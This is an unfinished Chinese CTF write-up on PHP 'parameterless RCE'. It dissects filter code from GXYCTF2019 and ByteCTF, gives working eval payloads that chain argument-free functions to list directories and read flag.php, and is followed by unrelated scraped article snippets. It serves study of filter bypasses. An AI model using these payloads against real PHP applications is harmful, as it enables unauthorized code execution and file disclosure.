浅谈无参数RCE[未完】

0x00 前言

这几天做了几道无参数RCE的题目,这里来总结一下,以后忘了也方便再捡起来。
首先先来解释一下什么是无参数RCE:

形式:

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']);}
preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)
pre_match('/et|na|nt|strlen|info|path||rand|dec|bin|hex|oct|pi|exp|log/i', $code))

分析一下代码:

preg_replace 的主要功能就是限制我们传输进来的必须是纯小写字母的函数,而且不能携带参数。
再来看一下:(?R)?,这个意思为递归整个匹配模式。所以正则的含义就是匹配无参数的函数,内部可以无限嵌套相同的模式(无参数函数)

preg_match的主要功能就是过滤函数,把一些常用不带参数的函数关键部分都给过滤了,需要去构造别的方法去执行命令。

因此,我们可以用这样一句话来解释无参数RCE:
我们要使用不传入参数的函数来进行RCE
比如:

print_r(scandir('a()'));可以使用
print_r(scandir('123'));不可以使用

再形象一点,就是套娃嘛。。一层套一个函数来达到我们RCE的目的
比如:

?exp=print_r(array_reverse(scandir(current(localeconv()))));

0x01 从代码开始分析

我们先来看一下几天前刚做的一道题目:

[GXYCTF2019]禁止套娃
源码:

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

我们先来分析一下源码吧:

1:需要以GET形式传入一个名为exp的参数。如果满足条件会执行这个exp参数的内容。
2:preg_match过滤了我们伪协议的可能
3:preg_replace 的主要功能就是限制我们传输进来的必须时纯小写字母的函数,而且不能携带参数。只能匹配通过无参数的函数。
4:最后一个preg_match正则匹配掉了et/na/info等关键字,很多函数都用不了
5:eval($_GET['exp']);?典型的无参数RCE

既然getshell基本不可能,那么考虑读源码看源码,flag应该就在flag.php我们想办法读取
首先需要得到当前目录下的文件scandir()函数可以扫描当前目录下的文件,例如:

<?php print_r(scandir('.')); ?>

那么问题就是如何构造scandir(‘.‘)

这里再看函数
localeconv() 函数:
返回一包含本地数字及货币格式信息的数组。而数组第一项就是.current() 返回数组中的当前单元, 默认取第一个值。

这里还有一个知识点:

current(localeconv())永远都是个点

那么我们第一步就解决了:

print_r(scandir(current(localeconv())));
print_r(scandir(pos(localeconv())));

pos() 是current() 的别名。

现在的问题就是怎么读取倒数第二个数组呢?

看手册:

很明显,我们不能直接得到倒数第二组中的内容:

三种方法:

1.array_reverse()

以相反的元素顺序返回数组

?exp=print_r(array_reverse(scandir(current(localeconv()))));

2.array_rand(array_flip())

array_flip()交换数组的键和值

?exp=print_r(array_flip(scandir(current(localeconv()))));

array_rand()从数组中随机取出一个或多个单元,不断刷新访问就会不断随机返回,本题目中scandir()返回的数组只有5个元素,刷新几次就能刷出来flag.php

?exp=print_r(array_rand(array_flip(scandir(current(localeconv())))));

3.session_id(session_start())

本题目虽然ban了hex关键字,导致hex2bin()被禁用,但是我们可以并不依赖于十六进制转ASCII的方式,因为flag.php这些字符是PHPSESSID本身就支持的。

使用session之前需要通过session_start()告诉PHP使用session,php默认是不主动使用session的。

session_id()可以获取到当前的session id。

因此我们手动设置名为PHPSESSID的cookie,并设置值为flag.php

那么我们最后一个问题:如何读flag.php的源码

因为et被ban了,所以不能使用file_get_contents(),但是可以可以使用readfile()或highlight_file()以及其别名函数show_source()

view-source:http://x.x.x.x:x/?exp=print_r(readfile(next(array_reverse(scandir(pos(localeconv()))))));
?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
?exp=show_source(session_id(session_start()));

我们再来看一个题目:

ByteCTF Boringcode
来看代码:

 $code = file_get_contents($url);
            if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
                if (preg_match('/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
                    echo 'bye~';
                } else {
                    eval($code);
                }
            }
        } else {
            echo "error: host not allowed";
        }
    } else {
        echo "error: invalid url";
    }
}else{
    highlight_file(__FILE__);
}

我们简单分析一下:
preg_match中
因为只允许使用纯字母函数,print_r这里被禁止掉了
注意这里的过滤比上面的多了很多,比如current就不能用了,我们可以用pos代替
看wp:


echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));

我们一层一层的来分析:
首先题目给了提示,flag在上一级目录
所以我们要切换到上一级并读取 flag

1:localeconv()函数
前面已经提过:
localeconv() 函数:
返回一包含本地数字及货币格式信息的数组。而数组第一项就是.current() 返回数组中的当前单元, 默认取第一个值。

这里还有一个知识点:

current(localeconv())永远都是个点

2:pos()函数
前面提过:

作用: 返回数组中的当前元素的值
因为正则条件中有nt,所以current()函数就无法使用,但是它有一个别名,就是pos()
3:?scandir()函数

前面 pos() 函数输出的值为点(.),所以这里变成scandir(.),也就是当前目录

介绍下一个函数前我们先来了解一下php的数组指向函数,上一个题目简单提了一下

4:?next()函数

作用: 将数组中的内部指针向前移动一位

在刚才 scandir() 函数返回的数组中,第一位是点(.),此时指针默认指向该位(也就是第一位),通过next()函数,将指针移动到下一位,也就是点点(..)

5:chdir()函数

next() 函数返回点点(..),chdir()函数执行 chdir(..) 也就把目录切换到了上一级
6:time()函数

chdir() 函数返回的是 bool 类型的 true ,所以对不需要传入参数的time()函数来说,本来就没有影响,可以正常执行
7:localtime()函数

localtime()函数可以接受参数,并且第一个参数可以直接接受time(),所以直接利用
8:pos()函数

获取第一个参数,也就是系统当前的秒数
9:chr()函数

chr()函数在这里什么作用呢?因为当秒数为46时,chr(46)=”.”,用来获取点(.)(这里不能再用 localeconv() 函数是因为它不能传入参数)
10:scandir()函数

继续扫描当前目录(默认目录得上一级,因为我们刚才已经 chdir(“..”) 切换过)
11:end()函数

作用: 将?array?的内部指针移动到最后一个单元并返回其值
scandir() 返回当前目录的数组,end()函数将指针移动到最后一个(这里就是 flag.php ,因为文件名按字母先后排序,而字母?f?在本题中排最后
12:readfile()函数

作用: 读取文件并写入到输出缓冲
这里将执行readfile(“flag.php”),将 flag.php 的内容读取出来
13:echo()函数

用echo()函数将 flag 输出

写了一半了。。下午再写剩下的

原文地址:https://www.cnblogs.com/wangtanzhi/p/12311239.html

时间: 2024-11-06 03:49:55

浅谈无参数RCE[未完】的相关文章

黑马程序员_浅谈out参数、ref参数和可变参数

1.out参数 out关键字会导致参数通过引用来传递,通俗点说,就是往外传值的. out参数的作用:用于以内部变量为外部变量赋值的,out一般适用于某个方法不只是使用return返回单个值,而是需要有多个返回值的情况. out参数的使用需要注意以下几点:  1)out参数传递的变量在传递之前不需要对其进行初始化. 分析:在调用方法之前,对out参数传递的变量只需声明,可以赋值也可以不赋值,不过反正都是要在调用时被覆盖掉,所以大可不必赋值,因为赋值了虽然不会报错,但却根本也没有用处,没必要多此一举

菜鸟浅谈“诈骗”希望“治未病&quot;

关于目前诈骗.社工数据的套路,说道说道~ 一.前言 这篇文章没有什么高深的技术,只有普普通通的套路,主要也是有I春秋各位表哥与诈骗分子的交手有感而发! 二.正文 因为我们上网的或者其他条件下的人群,没有I春秋各位的套路! 在这个新的互联网时代隐私基本不存在的时代.我们普通人如何远离各种"诈骗"各种奇葩的互联网因个人信息泄露而造成的伤害那? 全国14亿人,有多少"凯文米特"?又有多少"i春秋的大表哥"? 那么普通人在各个全球互联,同时一个"

浅谈无缓存I/O操作和标准I/O文件操作区别

首先,先稍微了解系统调用的概念: 系统调用,英文名system call,每个操作系统都在内核里有一些内建的函数库,这些函数可以用来完成一些系统系统调用把应用程序的请求传给内核,调用相应的的内核函数完成所需的处理,将处理结果返回给应用程序,如果没有系统调用和内核函数,用户将不能编写大型应用程序,及别的功能,这些函数集合起来就叫做程序接口或应用编程接口(ApplicationProgramming Interface,API),我们要在这个系统上编写各种应用程序,就是通过这个API接口来调用系统内

浅谈无缓存I/O操作和标准I/O文件操作差别

首先,先略微了解系统调用的概念: 系统调用,英文名system call,每一个操作系统都在内核里有一些内建的函数库,这些函数能够用来完毕一些系统系统调用把应用程序的请求传给内核,调用对应的的内核函数完毕所需的处理,将处理结果返回给应用程序,假设没有系统调用和内核函数,用户将不能编写大型应用程序,及别的功能,这些函数集合起来就叫做程序接口或应用编程接口(ApplicationProgramming Interface,API),我们要在这个系统上编写各种应用程序,就是通过这个API接口来调用系统

【C语言】浅谈可变参数与printf函数

一.何谓可变参数 int printf( const char* format, ...); 这是使用过C语言的人所再熟悉不过的printf函数原型,它的参数中就有固定参数format和可变参数(用"-"表示). 而我们又可以用各种方式来调用printf,如: printf( "%d ",value); printf( "%s ",str); printf( "the number is %d ,string is:%s ",

浅谈无状态和有状态服务的区别

对服务器程序来说,究竟是有状态服务,还是无状态服务,其判断依旧——两个来自相同发起者的请求在服务器端是否具备上下文关系. 状态化请求,服务器端一般都要保存请求的相关信息,每个请求可以默认地使用以前的请求信息. 无状态请求,服务器端所能够处理的过程必须全部来自于请求所携带的信息,以及其他服务器端自身所保存的.并且可以被所有请求所使用的公共信息. 一.比较 有状态服务常常用于实现事务(并不是唯一办法,下文有另外的方案).举一个常见的例子,在商城里购买一件商品.需要经过放入购物车.确认订单.付款等多个

浅谈移动前端的最佳实践(转)

前言 这几天,第三轮全站优化结束,测试项目在2G首屏载入速度取得了一些优化成绩,对比下来有10s左右的差距: 这次优化工作结束后,已经是第三次大规模折腾公司框架了,这里将一些自己知道的移动端的建议提出来分享下,希望对各位有用 文中有误请您提出,以免误人自误 技术选型 单页or多页 spa(single page application)也就是我们常常说的web应用程序webapp,被认为是业内的发展趋势,主要有两个优点: ① 用户体验好 ② 可以更好的降低服务器压力 但是单页有几个致命的缺点:

Web服务器和动态语言如何交互--CGI&amp;FastCGI&amp;FPM浅谈

一个用户的Request是如何经过Web服务器(Apache,Nginx,IIS,Light)与后端的动态语言(如PHP等)进行交互并将结果返回给用户的呢? 本文浅谈个人观点,可能有误,欢迎拍砖,共同学习. 一. 首先明确几个概念,以便后续说明 CGI:(Common Gateway Interface)Http服务器与后端程序(如PHP)进行交互的中间层. 工作原理及处理方式(fork-and-execute模式): 1.当Web Server有Request到达 2.fork一个CGI进程或

浅谈Hybrid技术的设计与实现

浅谈Hybrid技术的设计与实现 前言 随着移动浪潮的兴起,各种APP层出不穷,极速的业务扩展提升了团队对开发效率的要求,这个时候使用IOS&Andriod开发一个APP似乎成本有点过高了,而H5的低成本.高效率.跨平台等特性马上被利用起来形成了一种新的开发模式:Hybrid APP. 作为一种混合开发的模式,Hybrid APP底层依赖于Native提供的容器(UIWebview),上层使用Html&Css&JS做业务开发,底层透明化.上层多多样化,这种场景非常有利于前端介入,非